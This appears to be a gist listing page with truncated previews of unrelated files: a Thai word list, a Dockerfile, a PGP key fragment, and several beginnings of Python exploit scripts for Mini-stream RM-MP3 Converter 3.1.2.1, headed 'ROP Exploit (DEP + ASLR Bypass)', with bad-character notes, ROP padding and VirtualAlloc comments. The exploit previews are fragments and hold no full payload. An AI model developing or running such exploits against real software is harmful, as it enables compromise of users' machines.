This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| 1-สัมมนา | |
| 2-จ๋า | |
| 3-เรา | |
| 4-เลิก | |
| 5-กันเถอะ | |
| 6-เรา | |
| 7-ไม่ได้ | |
| 8-นอน | |
| 9-หลาย | |
| 10-คืน |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/python | |
| import sys, struct | |
| file="crash.m3u" | |
| #---------------------------------------------------------------------# | |
| # Badchars: '\x00\x09\x0A' # | |
| #---------------------------------------------------------------------# |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/python | |
| import sys, struct | |
| file="crash.m3u" | |
| rop = struct.pack('<L',0x41414141) # padding to compensate 4-bytes at ESP | |
| #---------------------------------------------------------------------# |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/python | |
| import sys, struct | |
| file="crash.m3u" | |
| #---------------------------------------------------------[Structure]-# | |
| # LPVOID WINAPI VirtualAlloc( => PTR to VirtualAlloc # | |
| # _In_opt_ LPVOID lpAddress, => Return Address (Call to ESP) # | |
| # _In_ SIZE_T dwSize, => dwSize (0x1) # | |
| # _In_ DWORD flAllocationType, => flAllocationType (0x1000) # |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/python | |
| import sys, struct | |
| file="crash.m3u" | |
| #---------------------------------------------------------[Structure]-# | |
| # LPVOID WINAPI VirtualAlloc( => PTR to VirtualAlloc # | |
| # _In_opt_ LPVOID lpAddress, => Return Address (Call to ESP) # | |
| # _In_ SIZE_T dwSize, => dwSize (0x1) # | |
| # _In_ DWORD flAllocationType, => flAllocationType (0x1000) # |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/python | |
| import sys, struct | |
| #################################################### | |
| # ROP Exploit (DEP + ASLR Bypass) # | |
| # Mini-stream RM-MP3 Converter version 3.1.2.1 # | |
| # Author: un4ckn0wl3z # | |
| # Site: https://haxtivitiez.wordpress.com/ # | |
| # Thank: Fuzzysecurity # | |
| #################################################### |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| FROM centos | |
| RUN yum update -y | |
| RUN yum install httpd -y | |
| EXPOSE 80 | |
| CMD ["httpd", "-DFOREGROUND"] |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| -----BEGIN PGP PUBLIC KEY BLOCK----- | |
| Version: GnuPG v2 | |
| mQENBFju7wUBCADUBu4569x9mDCdiHKbwOMcCm4VKy8VDmMZXjR1sHyZ4j0tXQ3v | |
| CCT2HQUm0NiKI6gmhuULDFQIUceq42ognhvMVq2KOfgazqurCai9LwMfjdaNAwUZ | |
| 908tPL8vIHVZ8e3/iitB7ymo5W36znKShUC+rz5/kryrqQ/9XTMvjBrigXmbptd6 | |
| OKwqen/sF4xUh7c6Wu853xfFw3qk3QvKvSNI1q7Qmf9ZqCc5+CLpHEuOfr1RheYW | |
| Z4Ld4PHwgUvLplBnKHHzz8f4dZUVA4sOOwURPltrDumwp7lrJ1ZYNNPKYgdu4Cfb | |
| Qb73CNpbmZS4N/mmtQiVaBkO1aYscAuwzQtTABEBAAG0L3VuNGNrbjB3bDN6ICho | |
| YXh0aXZpdGlleikgPHNsaWNrZXJ0aEBnbWFpbC5jb20+iQE5BBMBCAAjBQJY7u8F |